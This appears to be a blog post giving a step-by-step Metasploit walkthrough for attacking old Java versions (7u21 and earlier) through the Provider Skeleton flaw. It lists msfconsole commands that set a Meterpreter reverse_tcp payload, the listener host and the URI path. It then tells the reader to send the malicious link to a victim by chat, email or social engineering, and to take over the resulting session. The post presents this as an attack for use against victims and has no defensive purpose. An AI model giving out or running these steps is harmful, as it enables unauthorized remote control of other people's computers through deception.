This module
abuses the insecure invoke () method of the Provider Skeleton class that allows
to call arbitrary static methods with user supplied arguments. The
vulnerability affects Java version 7u21 and earlier.
Exploit
Targets
Windows PC
Linux PC
MAC PC
Java 7 update 21
Requirement
Attacker: Kali Linux
Victim PC: Windows 7
Open Kali Linux terminal type msfconsole
Now type use exploit/multi/browser/java_jre17_provider_skeleton
msf exploit (java_jre17_provider_skeleton)>set payload java/Meterpreter/reverse_tcp
msf exploit (java_jre17_provider_skeleton)>set lhost 192.168.1.146 (IP of
Local Host)
msf exploit (java_jre17_provider_skeleton)>set srvhost 192.168.1.146 (This
must be an address on the local machine)
msf exploit (java_jre17_provider_skeleton)>set uripath / (The Url to use for
this exploit)
msf exploit (java_jre17_provider_skeleton)>exploit
Now an URL you should give to your
victim http://192.168.1.146:8080
Send the link of the server to the victim
via chat or email or any social engineering technique.
Now you have access to the victims PC. Use “sessions -l” and the Session number to connect to the session. And Now Type “sessions -i ID“
0 comments:
Post a Comment